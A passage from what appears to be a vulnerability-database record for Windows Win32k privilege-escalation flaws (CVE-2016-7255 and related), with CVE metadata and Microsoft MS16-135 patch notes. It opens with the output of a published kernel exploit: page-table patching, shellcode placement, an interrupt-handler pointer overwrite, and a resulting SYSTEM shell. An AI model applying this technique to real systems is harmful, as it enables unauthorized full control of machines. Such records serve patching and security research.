................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | 
........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n \r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 
99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n \r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n \r\nC:\\Users\\qa\\Desktop>\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/26414", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T15:11:40", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-10T07:00:00", "type": "cve", "title": "CVE-2016-7255", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2016-7255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-04-12T21:18:13", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 
7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1732", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2022-04-12T18:41:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-1732", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:57:29", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE 
ID is unique from CVE-2021-1732.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1698", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-03T19:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2021-1698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2022-05-12T13:04:53", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin MS16-135](<https://technet.microsoft.com/library/security/ms16-135>). \n\n## More Information\n\nImportant \n \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Turn on automatic updating in Control Panel](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=3198234>) website. 
\n\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Support for Microsoft Update](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Troubleshooting and Support](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Virus Solution and Security Center](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB3198234-ia64.msu| DD7E655150D4F2D441743C212A7FEE1871CCF781| 93A226E7C857A8D9C4AD77E3BC0CB82A77B471A90F74E5C1E9CAD462838D5B18 \nWindows6.0-KB3198234-x64.msu| D35CBDB3FEE35903E7EA4901A38F18F9376CD94F| 3CBD04470C7CD465405B499C3196E8D8CCA6DF2B1E836F88F7CFA86BA301A256 \nWindows6.0-KB3198234-x86.msu| 965D8E33DA8E948E45E47ECB56837CE2028A8BCB| 82F4D545700403418BAD7D1DF062738D23EBA1368C8F6D80B5C544C9C83235BB \n \n\n\n## \n\n__\n\nFile information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \nWindows Vista and Windows Server 2008 file informationNotes The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed. 
\n \nFor all supported ia64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 6,697,984| 25-Oct-2016| 22:52| IA-64 \nWin32k.sys| 6.0.6002.24029| 6,707,712| 25-Oct-2016| 14:29| IA-64 \n \n \nFor all supported x64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 2,804,736| 25-Oct-2016| 23:10| x64 \nWin32k.sys| 6.0.6002.24029| 2,807,296| 25-Oct-2016| 14:48| x64 \n \n \nFor all supported x86-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 2,073,600| 25-Oct-2016| 22:47| x86 \nWin32k.sys| 6.0.6002.24029| 2,080,768| 25-Oct-2016| 14:26| x86 \n \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T08:00:00", "type": "mskb", "title": "MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-08T08:00:00", "id": "KB3198234", "href": 
"https://support.microsoft.com/en-us/help/3198234", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:58", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-135\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-135</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3199135\" id=\"kb-link-6\" target=\"_self\">3199135</a> MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-7\" target=\"_self\">3198234</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3194371\" id=\"kb-link-8\" target=\"_self\">3194371</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198218\" id=\"kb-link-9\" target=\"_self\">3198218</a> MS16-131 and MS16-135: Description of the security update for Windows: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-10\" target=\"_self\">3197873</a> November 2016 Security Only Quality Update for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-11\" target=\"_self\">3197874</a> November 2016 Security Monthly Quality Rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-12\" target=\"_self\">3197876</a> November 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-13\" target=\"_self\">3197877</a> November 
2016 Security Monthly Quality Rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-14\" target=\"_self\">3197867</a> November 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-15\" target=\"_self\">3197868</a> November 2016 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-16\" target=\"_self\">3198585</a> Cumulative Update for Windows 10: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-17\" target=\"_self\">3200970</a> Cumulative Update for Windows 10 Version 1607 and Windows Server 2016: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-18\" target=\"_self\">3198586</a> Cumulative Update for Windows 10 Version 1511: November 8, 2016</li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 
32-bit editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. 
Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" 
